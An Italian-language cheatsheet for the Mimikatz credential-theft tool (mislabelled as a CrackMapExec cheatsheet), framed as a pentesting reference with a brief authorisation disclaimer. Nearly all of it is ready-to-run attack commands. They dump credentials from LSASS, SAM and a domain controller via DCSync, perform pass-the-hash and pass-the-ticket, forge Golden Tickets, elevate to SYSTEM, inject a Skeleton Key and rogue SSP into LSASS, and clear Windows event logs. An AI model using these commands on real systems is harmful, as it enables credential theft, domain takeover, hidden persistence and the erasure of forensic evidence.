Mimikatz

Cheatsheet per CrackMapExec

Descrizione

Mimikatz è uno strumento open-source per l'estrazione e la gestione di credenziali su sistemi Windows. Utilizzato in attività di pentesting e analisi forense, consente di:

Estrarre credenziali da memoria (password in chiaro, hash NTLM, Kerberos).
Effettuare attacchi avanzati come Pass-the-Hash, Pass-the-Ticket e creare Golden Ticket.
Elevare privilegi, manipolare processi e analizzare log eventi.

Richiede privilegi elevati (Administrator o SYSTEM). È uno strumento legittimo per la sicurezza, ma è spesso abusato in contesti malevoli. Utilizzalo responsabilmente e con autorizzazione.

Altre Cheet Sheet: - Mimikatz-cheatsheet - InternalAllTheThings - mimikatz-cheatsheet

Comandi Generali

exit Esce da Mimikatz.
powershell
```
mimikatz # exit
```
cls Pulisce la console.
powershell
```
mimikatz # cls
```
log Registra l'output in un file.
powershell
```
mimikatz # log
```
base64 Cambia l'output in Base64.
powershell
```
mimikatz # base64
```
version Mostra le versioni di Mimikatz e di Windows.
powershell
```
mimikatz # version
```

Privilege

privilege::debug Richiede il privilegio di debug per accedere a processi critici.
powershell
```
mimikatz # privilege::debug
```

Sekurlsa

logonpasswords Estrae credenziali da LSASS.
powershell
```
mimikatz # sekurlsa::logonpasswords
```

pth Pass-the-Hash per autenticarsi con hash NTLM.

powershell

mimikatz # sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:<hash>

tickets Lista/esporta i ticket Kerberos attivi.
powershell
```
mimikatz # sekurlsa::tickets /export
```
msv Recupera hash NTLM e credenziali memorizzate.
powershell
```
mimikatz # sekurlsa::msv
```
wdigest Estrae password in chiaro, se WDigest è abilitato.
powershell
```
mimikatz # sekurlsa::wdigest
```

Lsadump

lsa Dump delle credenziali SAM o Active Directory.
powershell
```
mimikatz # lsadump::lsa /patch
```
sam Dump del database SAM.
powershell
```
mimikatz # lsadump::sam
```
dcsync Estrae hash NTLM direttamente dal DC.
powershell
```
mimikatz # lsadump::dcsync /user:Administrator
```

Kerberos

ptt Inietta un ticket Kerberos per autenticarsi.
powershell
```
mimikatz # kerberos::ptt <ticket.kirbi>
```

golden Crea un Golden Ticket.

powershell

mimikatz # kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-... /krbtgt:<hash>

list Lista ed esporta ticket Kerberos.
powershell
```
mimikatz # kerberos::list /export
```

Token

token::list Mostra tutti i token disponibili nel sistema.
powershell
```
mimikatz # token::list
```
token::elevate Eleva i privilegi a SYSTEM.
powershell
```
mimikatz # token::elevate
```

Vault

vault::list Lista le credenziali salvate nella Vault di Windows.
powershell
```
mimikatz # vault::list
```

Event

event::clear Cancella i log degli eventi di Windows.
powershell
```
mimikatz # event::clear
```

Service

service::list Lista i servizi di sistema.
powershell
```
mimikatz # service::list
```
service::start Avvia un servizio specifico.
powershell
```
mimikatz # service::start <nome_servizio>
```
service::stop Ferma un servizio specifico.
powershell
```
mimikatz # service::stop <nome_servizio>
```

Misc

misc::memssp Inietta un provider SSP personalizzato in LSASS.
powershell
```
mimikatz # misc::memssp
```
misc::skeleton Inietta una Skeleton Key in LSASS.
powershell
```
mimikatz # misc::skeleton
```

Crypto

crypto::certificates Lista ed esporta i certificati.
powershell
```
mimikatz # crypto::certificates /export
```

Net

net::user Mostra gli utenti locali.
powershell
```
mimikatz # net::user
```
net::session Lista le sessioni attive.
powershell
```
mimikatz # net::session
```

Suggerimenti

Debug Privileges: Usa sempre privilege::debug per accedere a processi protetti come LSASS.
Minidump: Analizza i dump di LSASS offline con sekurlsa::minidump.
Backup Log: Registra sempre l'output con il comando log.